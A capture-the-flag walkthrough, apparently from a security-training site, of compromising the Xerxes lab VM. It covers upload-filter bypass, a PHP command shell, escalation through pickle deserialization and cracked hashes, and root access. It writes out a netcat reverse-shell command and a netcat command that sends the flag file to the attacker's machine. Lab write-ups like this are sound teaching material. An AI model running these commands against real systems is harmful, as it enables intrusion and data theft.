Capture the flag (CTF)

Xerxes Challenge

Warlock
March 11, 2014 by
Warlock

In this article we are going to solve another challenge of Xerxes. Xerxes is historically known as a god king, but here Xerxes is a vulnerable machine and our challenge is to capture the flag from it. The machine consists of a Web application which is under construction, but there is a loophole to enter into the Web server. First we downloaded the VM and hosted it in VMware workstation.

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

We will run an Nmap ping scan for detecting all live hosts.

As can be seen in the above figure, Nmap detected three hosts: The IP 192.168.0.1 is my router, the IP 192.168.0.101 is my system's IP, and the IP 192.168.0.102 is our target. Try to open this IP from the browser.

As can be seen in the above figure, this is the default Web server page. There is an application hosted there. First, we will start enumerating the whole application to try to find all possible URLs of this application. For enumeration, we will use Burp Suite's Spider option.

After spidering the application, we now have some internal URLs for the application. We can see some PHP files over there under the dev directory. The upload.php file is used for file upload functionality. We opened the index page from dev directory.

First we tried to upload a normal image file, but the page needs a valid password for uploading any file. Otherwise it shows an error that the page is under construction and is password protected to prevent data tampering.

Well this is a nice security adaption, but this is a challenge. It means there must be a clue or a hidden something. We checked every page where there is password or something, we checked the source code also, but there is nothing. In this application only three pages are working: the Upload page for uploading where we can't do anything until we don't have the password; second is the About page that page is full static, there's nothing to do with it; and the last one is the Forgot Password page which has a QR image.

At that moment we didn't notice that QR image, but then we thought, why is this QR here? The developer of this Web application put this QR code in the Forgot Password page, so it means there must be use of this image. Then we Googled the QR image to try to find the use of the QR image, and surprisingly we found some good results. This image can store sensitive information which can readable by the camera on a smartphone. Then we Googled for a QR code online scanner and we found some sites which can scan a QR image. Now we save the QR image from that page and put it in an online scanner as shown in the below figure.

After scanning the image, we found something: a Base64 encoded code.

We easily decoded this code in plain text and the result is: look deeper.

Oh! This is the password for uploading files. We tried this password for uploading a file, but it didn't work. So what is the use of this password "look deeper"? Where do we look? We looked here and there in the whole application but can't find anything. Then we started to look into the image. The clue was "look deeper", so we started to zoom the image larger and larger. Is there any password hidden in the image? No, but there are some pixels on the top left side.

Here we are using Gimp Editor, but you can use any image editing application. Then we started to look deeply inside the pixels for clue but found nothing. Then we started to Google the image pixels and we found that pixels are a programmable color on a computer display. It means it must have some value. Now we start to find out that there is a value behind the pixels. After Googling a Photoshop tutorial, we found the Color Picker tool for viewing the alpha value of each pixel.

By removing all layers via color picker, the alpha values for each pixel were revealed.

By using this method, we found the all alpha values. It took me a while, so I'll just give you the first five: 75, 121, 116, 115, 77. After gathering all alpha values, we converted them to ASCII value and the output was a Base64 encoded value.

We decoded the value and the result was horrible.

As we can see the result ++++++[>++++++++<-]>++++.+.----.-.. What the hell is this? We Googled this code but can't find anything. So the question arises again, what is this? Is it any programming language? How we will identify which language it is? So we Googled for an online compiler where all kinds of languages can be compiled.

We tried here several programming languages for compiling the code. At the end we found one language which was Brainfuck script and gives an output in plaintext that was 45100.

After that we tried to upload a txt file for uploading and it successfully uploaded. Now we tried to upload a php file on the server but we can't. So we know that it is a Debian server. Then we Googled for the Debian Apache configuration file. After studying the config file, we found that if we will upload a php file with pht extension then we will execute that pht file as a php file. We tried to upload a php file by changing the extension, and it is working fine.

So we want to execute system commands on the server. That's why we have written this small php code.

We will parse all our commands from the cmd parameter. We uploaded this file as a reverse.pht and browse it from the uploaded directory.

Open the file and try to execute some commands from cmd parameter. Here for example we are executing the whoami command.

As can be seen below, the commands are successfully executing on the server. Now its time to enter into the server. We will use Netcat for listening to the reverse connection. To prepare Netcat, first type in nc -lvp 443

Then pass this command from the URL /bin/nc -e /bin/sh 192.168.0.103 443 & for listening to the connection from Netcat.

And here comes the connection initiated from the target host.

We execute some commands over there, as can be seen below. The id command is for checking all users' id and then we used the pwd command for checking the current directory where we are.

Now let's check the home directory and how many users there are by executing this command: ls -lart /home

Command usage:

ls - for listing

l- use a long listing format

a- do not hide entries

r- reverse order while sorting

t- sort by modification time

As we can see in above figure, currently there are three users in this system: amanpour, curtiz, and delacroix, but we dont have permissions for all users except amanpour.

First access amanpour's directory by typing in cd ~amanpour and then list all his files and folders by typing ls -lart

We can see in the above figure what amanpour was doing. We can see the lastpassword.png file, the QR image from where we extracted the password. We also noticed that there is ssh enabled, so there is a possibility to login via ssh if we have a valid credential. So let's check the command history of amanpour, type in cat.bash_history

We can see now all executed commands of amanpour. The steqr.py file has the feature of creating a new password.

We executed the command python steqr.py -f newpassword and we got a new password.

Now we have a password and we tried to login via ssh. Type in ssh amanpour@192.168.0.102 and then enter the new password.

We are successfully logged in via ssh. We typed id command for checking all users id and group id and we found that in group there is something called notes. What is that?

First we started to find all SUID files by typing find / -perm -4000 -type f 2>/dev/null

SUID is a special type of file permissions given to a file. Normally in Linux/Unix when a program runs, it inherits access permissions from the logged in user. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather than the user who runs it. In simple words users will get file owner's permissions as well as owner UID and GID when executing a file/program/command.

As we can see in the above figure, we found all directories having SUID permissions and the first one is /opt/notes and this is what we are looking for. So we entered the notes directory and listed all files inside it.

We found only two files: notes and notes.py. We opened that notes.py file by typing cat notes.py

So what is notes.py? Basically notes.py is a small application for keeping notes, like Notepad. By reviewing the source code of the notes.py file we identified that any file executable from this application is excuted as home/curtiz. Curtiz is another user on this system and our next target is to take over in his account.

Another thing is we can see in the source code is the import pickle function. What is pickle? This is our next headache. We Googled for Python pickle and we found positive results. It is used for serializing and de-serializing a Python object structure. Any object in Python can be pickled so that it can be saved on disk. What pickle does is that it "serialises" the object first before writing it to file.

Now we know that any file executed via notes it will execute as curtiz. So what if we executed any shell via this application? Then we first created a blank file in /tmp/ directory by typing touch /tmp/foo and then opened that file by vi command

Now we have a blank file. Then we Googled for pickle expoits and shellcode, for if we found something, then we would write that exploit in this blank file. Hopefully we found a arbitrary code execution shellcode, and we just copy/pasted the small shellcode in the blank file and saved it.

Now we opened the notes application by typing ./notes

By using the help command we can see all the usage commands of the notes application. Now its time to load our shell file by typing load../../tmp/foo

And we got the shell here and we executed the id command as shown below.

Now we have access to the curtiz directory. Get inside it by typing cd ~curtiz and after that check all files and directories by typing ls -lart

Now we can see all files over there and the first eye catching file is notes. Open that file by typing cat notes.

There is a message that somebody found Marie's keyfile and he was able to login via ssh. Now the question arises here: who is Marie? Is she an another user? But earlier when we checked out the home directory for all users there was only three: amanpour, curtiz and delacroix. We again opened the notes.bak file and there was also the same message. So we tried to grep the Marie password by typing grep Marie /etc/passwd

And the result answered our question: Marie is delacroix. So we opened the /bin/delacroix file by using strings /bin/delacroix. The strings command is mainly useful for determining the contents of non-text files.

And what we see here a MD5 hash. It must be a password for ssh. We decoded the MD5hash successfully via online web service.

The password is VonBraun. Then we tried to login via ssh as delacroix (Marie) but we aren't able to login.

Now what was the problem? Why we are not able to login, though the password is right? So then we opened the id_rsa key file by typing cat id_rsa

After that we copied the whole key in our local system under the tmp directory with same name.

Again we tried to login via ssh from our system by typing ssh -i id_rsa delacroix@192.168.0.012 and then the password VonBraun.

We sucessfully logged in and then check out its directory files by typing ls -lart

In delacroix's directory we can see two sh files over there: check.sh and generate.sh file. Let's open them both.

What do we see in the source code of the check.sh file? It is echoing the greeting message when logging in and the script checks for the number of seconds since the file /home/delacroix/.last was created. If it's older than 86400 seconds (24 hours), it prompts Marie to change her password by using generate.sh and generate.sh creates a new .last file and uses the HH:MM timestamp of the file to generate a unique MD5.

Now we will check for all files' status by using the stat command and the users when they last logged-in or logged-out since that file was created. So type in stat .last

Now we can see the exact access time is 00:19:51. So, considering this, we can now extract the relevant part of generate.sh and compute the MD5 it would have provided Marie back when she last ran the script. So We typed echo 00:19:51 | md5sum | awk {'print $1'}

And it echoed the MD5 hash. We copied the hash. Now it's time to get root, we typed sudo bash and then for password we pasted the MD5hash over there.

And finally we got the root privileges. Now find the flag. Where is it? We entered into the root directory and there we found a flag file and we opened the file and it seems to be a PNG image.

By using Netcat we can download this image in our system. First prepare the Netcat in our system for receiving the flag file. Type in nc -lvp 4445 > flag

Now execute the Netcat command on the server for sending the flag. Type in nc 192.168.0.103 4445 < flag. Here the IP is my local system IP from where we will receive the flag.

After executing the command we received the file.

And what do we have? See here.

References:

http://staringintodevnull.blogspot.nl/2013/12/announcing-new-wargame-xerxes.html

What should you learn next?

What should you learn next?

From SOC Analyst to Secure Coder to Security Manager — our team of experts has 12 free training plans to help you hit your goals. Get your free copy now.

http://www.cs.jhu.edu/~s/musings/pickle.html

Warlock
Warlock

Warlock works as a Information Security Professional. He has quite a few global certifications to his name such as CEH, CHFI, OSCP and ISO 27001 Lead Implementer. He has experience in penetration testing, social engineering, password cracking and malware obfuscation. He is also involved with various organizations to help them in strengthening the security of their applications and infrastructure.